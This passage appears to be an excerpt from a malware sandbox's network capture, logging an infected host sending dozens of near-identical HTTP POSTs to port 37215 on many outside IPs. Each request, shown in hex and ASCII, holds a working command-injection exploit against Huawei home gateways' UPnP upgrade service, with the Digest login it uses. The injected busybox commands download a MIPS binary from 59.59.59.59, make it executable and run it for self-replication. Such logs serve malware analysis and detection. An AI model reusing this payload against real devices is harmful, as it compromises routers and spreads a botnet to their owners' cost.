70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          944192.168.2.1556582157.253.97.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713514090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          945192.168.2.155298441.21.54.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713653088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          946192.168.2.1533866157.212.182.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.713875055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          947192.168.2.1554248197.179.255.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714474916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          948192.168.2.1557324157.126.118.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714543104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          949192.168.2.1544714197.138.109.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714596987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          950192.168.2.1558130197.30.11.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714612007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          951192.168.2.1558668197.93.12.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714658976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          952192.168.2.1542264157.129.249.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714756012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          953192.168.2.1560602157.172.173.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714759111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          954192.168.2.156010241.230.16.12337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714793921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
